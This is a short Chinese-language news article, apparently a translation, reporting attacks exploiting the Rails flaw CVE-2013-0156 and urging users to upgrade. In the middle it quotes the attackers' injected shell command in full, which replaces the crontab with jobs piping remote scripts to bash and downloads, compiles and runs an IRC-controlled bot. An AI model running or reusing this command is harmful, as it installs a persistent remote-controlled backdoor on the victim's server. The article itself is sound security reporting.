在過(guò)去的幾天里，攻擊者已經(jīng)越來(lái)越多地試圖通過(guò)一個(gè) Rails 框架的安全漏洞來(lái)攻陷服務(wù)器。成功的入侵者在服務(wù)器上安裝一個(gè)機(jī)器人，使其等到來(lái)自 IRC 頻道的進(jìn)一步指示。

在安全專(zhuān)家 Jeff Jarmoc 的博客中寫(xiě)到，攻擊者是通過(guò) CVE 2013-0156 漏洞試圖攻擊的。盡管該漏洞已經(jīng)在1月份時(shí)關(guān)閉，但還有相當(dāng)多的服務(wù)器仍然運(yùn)行過(guò)時(shí)的 Ruby 版本。Jarmoc 稱(chēng)攻擊者嘗試注入如下命令：

crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k

這導(dǎo)致系統(tǒng)自動(dòng)下載 bot (k.c) 編譯然后執(zhí)行，Jarmoc 在其博客上也公布了該機(jī)器人程序的源碼。“k” 嘗試聯(lián)系位于 cvv4you.ru 域的 IRC 服務(wù)器，然后加入 #rails 頻道，在這里等待進(jìn)一步的攻擊指令。Jarmoc 稱(chēng) k 程序可通過(guò)指令下載并執(zhí)行任意代碼。目前該 IRC 服務(wù)器已經(jīng)能夠不可用，至少現(xiàn)在的地址是不可用的。

該機(jī)器人程序在進(jìn)程列表中顯示為 "- bash" ，啟動(dòng)時(shí)會(huì)同時(shí)創(chuàng)建一個(gè) /tmp/tan.pid 文件以確保同一時(shí)間只有一個(gè)進(jìn)程實(shí)例運(yùn)行。所有使用 Rails 框架的用戶(hù)應(yīng)該確認(rèn)正在使用當(dāng)前的 Rails 版本，當(dāng)前可靠的版本包括：3.2.13, 3.1.12 and 2.3.18.

英文原文： h-online

譯文鏈接：http://www.oschina.net/news/40942/attack-wave-on-ruby-on-rails